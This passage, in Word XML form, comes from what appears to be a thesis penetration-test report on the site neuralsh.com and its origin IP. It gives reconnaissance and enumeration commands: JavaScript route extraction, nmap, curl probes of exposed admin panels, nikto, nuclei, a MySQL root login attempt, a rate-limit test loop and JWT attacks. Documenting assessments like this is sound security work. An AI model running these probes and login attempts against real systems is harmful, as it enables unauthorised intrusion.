        <w:t>A key reconnaissance technique for Nuxt.js applications is extracting API route structures from the compiled JavaScript bundles that ship to the browser. Since the frontend is a Single-Page Application, all API endpoints are compiled into the client-side bundle and are publicly accessible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Extract API routes from the main Nuxt.js bundle</w:t>
        <w:br/>
        <w:t>curl -s https://neuralsh.com/_nuxt/Bpuv52g-.js | grep -oP '/web/v1/[^"&amp;\s]+' | sort -u</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>API Routes Discovered:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>/web/v1/init/token</w:t>
        <w:br/>
        <w:t>/web/v1/category</w:t>
        <w:br/>
        <w:t>/web/v1/text/search</w:t>
        <w:br/>
        <w:t>/web/v1/image/search</w:t>
        <w:br/>
        <w:t>/web/v1/report/save</w:t>
        <w:br/>
        <w:t>/api/geocode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The /web/v1/init/token endpoint — which was later exploited — was discovered here without any port scanning or directory brute force. The entire API surface was self-disclosed via the client-side JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.4 Scanning and Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>With the origin IP confirmed, active scanning was conducted against 103.16.62.217 to identify all exposed services and their versions. Scanning was performed from the Kali VM via SSH.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.4.1 Nmap Port and Service Scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sudo nmap -sV -sC -p 22,25,53,80,110,111,143,443,465,587,993,995,2000,2083,2087,2096,3306,5060,8899,9001 103.16.62.217</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="3908898"/>
            <wp:docPr id="8" name="Picture 8"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig49_nmap.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="3908898"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.9: Nmap full port scan of 103.16.62.217 — twenty-three open ports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Open ports discovered:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>PORT     STATE SERVICE     VERSION</w:t>
        <w:br/>
        <w:t>22/tcp   open  ssh         OpenSSH 8.9p1 Ubuntu</w:t>
        <w:br/>
        <w:t>25/tcp   open  smtp        Exim smtpd 4.99.2</w:t>
        <w:br/>
        <w:t>53/tcp   open  domain      PowerDNS</w:t>
        <w:br/>
        <w:t>80/tcp   open  http        Apache httpd</w:t>
        <w:br/>
        <w:t>110/tcp  open  pop3        Dovecot pop3d</w:t>
        <w:br/>
        <w:t>143/tcp  open  imap        Dovecot imapd</w:t>
        <w:br/>
        <w:t>443/tcp  open  https       Apache httpd</w:t>
        <w:br/>
        <w:t>465/tcp  open  smtps       Exim (SSL)</w:t>
        <w:br/>
        <w:t>587/tcp  open  smtp        Exim (STARTTLS)</w:t>
        <w:br/>
        <w:t>993/tcp  open  imaps       Dovecot</w:t>
        <w:br/>
        <w:t>995/tcp  open  pop3s       Dovecot</w:t>
        <w:br/>
        <w:t>2083/tcp open  https       cPanel (SSL login)</w:t>
        <w:br/>
        <w:t>2087/tcp open  https       WHM root panel (SSL)</w:t>
        <w:br/>
        <w:t>2096/tcp open  https       cPanel Webmail (SSL)</w:t>
        <w:br/>
        <w:t>3306/tcp open  mysql       MySQL 8.0.43</w:t>
        <w:br/>
        <w:t>9001/tcp open  http        MikroTik RouterOS webfig</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Twenty distinct TCP services were found exposed on a single public IP address. The presence of ports 2083, 2087, 3306, and 9001 was immediately alarming — these are administrative and database services that should never be accessible from the public internet.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.4.2 Service Verification with curl</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Following the Nmap scan, each high-risk service was probed directly to confirm it was accessible and responsive.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># WHM root administration panel</w:t>
        <w:br/>
        <w:t>curl -sk https://103.16.62.217:2087/ | grep "&lt;title&gt;"</w:t>
        <w:br/>
        <w:t># &lt;title&gt;WHM Login&lt;/title&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t># cPanel user panel</w:t>
        <w:br/>
        <w:t>curl -sk https://103.16.62.217:2083/ | grep "&lt;title&gt;"</w:t>
        <w:br/>
        <w:t># &lt;title&gt;cPanel Login&lt;/title&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t># MikroTik admin interface</w:t>
        <w:br/>
        <w:t>curl -v http://103.16.62.217:9001/ 2&gt;&amp;1 | grep -E "HTTP|title"</w:t>
        <w:br/>
        <w:t># HTTP/1.1 200 OK</w:t>
        <w:br/>
        <w:t># &lt;title&gt;RouterOS router configuration page&lt;/title&gt;</w:t>
        <w:br/>
        <w:br/>
        <w:t># Directory listing on origin</w:t>
        <w:br/>
        <w:t>curl -H "Host: neuralsh.com" http://103.16.62.217/</w:t>
        <w:br/>
        <w:t># &lt;title&gt;Index of /&lt;/title&gt;   (Apache directory listing enabled)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="597736"/>
            <wp:docPr id="9" name="Picture 9"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig410_cpanel_whm.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="597736"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.10: cPanel and WHM login pages accessible from the public internet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="1315624"/>
            <wp:docPr id="10" name="Picture 10"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig411_mikrotik.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="1315624"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.11: MikroTik RouterOS curl response confirming WebFig accessibility</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.4.3 Nikto Web Scanner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nikto -h https://neuralsh.com -output /home/rith/thesis/nikto_neuralsh.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5040000" cy="1747470"/>
            <wp:docPr id="11" name="Picture 11"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="fig412_nikto.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5040000" cy="1747470"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Figure 4.12: Nikto web scanner results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Key findings from Nikto included missing X-Frame-Options headers at the initial scan date, server version disclosure, and identification of robots.txt. The WAF blocked most of Nikto's signature-based checks against the main Cloudflare-fronted domain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.4.4 Nuclei Vulnerability Scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Nuclei was used to run template-based checks covering common web vulnerabilities, exposed admin panels, and misconfiguration patterns. It was run against both the Cloudflare-fronted domain and the origin IP directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>nuclei -u https://neuralsh.com -u http://103.16.62.217 -severity critical,high,medium -o /home/rith/thesis/nuclei_results.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>[FIGURE — Figure 4.13: Nuclei scan — zero matches (Cloudflare WAF absorbing probes)]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The Nuclei scan ran 6,221 templates against both the Cloudflare-fronted domain and the origin IP. Both scans returned zero template matches. The Cloudflare WAF absorbed and filtered the majority of probe requests against the main domain, while the origin IP scan completed without triggering any template signatures. This outcome is consistent with the nature of the vulnerabilities discovered: exposed admin panels, database ports, and authentication logic flaws are not detectable by template-based scanners — they require manual enumeration and targeted testing. The zero-match result reinforces that automated tooling alone would have missed all 20 findings in this engagement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.4.5 MySQL Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Confirm MySQL accepts connections from public internet</w:t>
        <w:br/>
        <w:t>mysql -h 103.16.62.217 -P 3306 -u root 2&gt;&amp;1</w:t>
        <w:br/>
        <w:t># ERROR 1045 (28000): Access denied for user 'root'@'[your-ip]' (using password: NO)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The error message itself is significant — it confirms that the MySQL server performed a full authentication handshake with the external IP. The server is not just passively listening; it actively engages with connection attempts. Cloudways uses auto-generated strong passwords, which prevented brute-force success, but the exposure itself represents a critical vulnerability regardless of credential strength.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>4.5 Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Following scanning and enumeration, each identified service and endpoint was systematically tested. This section documents the assessment of each major vulnerability category discovered.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.5.1 Authentication Rate Limiting Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The token endpoint discovered during JavaScript bundle analysis was tested for rate limiting behavior.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Baseline test — no bypass headers</w:t>
        <w:br/>
        <w:t>for i in $(seq 1 25); do</w:t>
        <w:br/>
        <w:t xml:space="preserve">    code=$(curl -s -o /dev/null -w "%{http_code}" https://neuralsh.com/web/v1/init/token)</w:t>
        <w:br/>
        <w:t xml:space="preserve">    echo "Request $i: HTTP $code"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    sleep 0.1</w:t>
        <w:br/>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>During the initial assessment period, rate limiting was observed to engage after approximately 18–19 consecutive requests from a single IP, returning HTTP 429. A follow-up verification test conducted on 11 June 2026 found that 30 consecutive requests all returned HTTP 200 with no rate-limit response — indicating that the rate limiting control was either removed or is no longer functioning. Regardless of this change, the X-Forwarded-For bypass technique was validated during the original assessment window and is documented in the exploitation phase.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.5.2 JWT Token Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The unauthenticated token endpoint was called directly, and the response was decoded using CyberChef.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s https://neuralsh.com/web/v1/init/token | python3 -m json.tool</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Response:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Decoded JWT:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="720" w:right="283" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Header:  {"alg":"HS256","typ":"JWT"}</w:t>
        <w:br/>
        <w:t>Payload: {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "type": "guest",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "tid": "550e8400-e29b-41d4-a716-446655440000",</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "iat": 1749220800,</w:t>
        <w:br/>
        <w:t xml:space="preserve">    "exp": 1749222600   (30-minute validity window)</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Any unauthenticated caller could obtain a valid signed JWT token with no credentials, API key, or device fingerprint required. Two JWT attacks were tested and blocked — algorithm substitution (alg:none) was rejected by the server, and secret key brute force against the rockyou.txt wordlist (14,344,391 candidates) exhausted without a match. The token farming itself, however, was the confirmed impact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
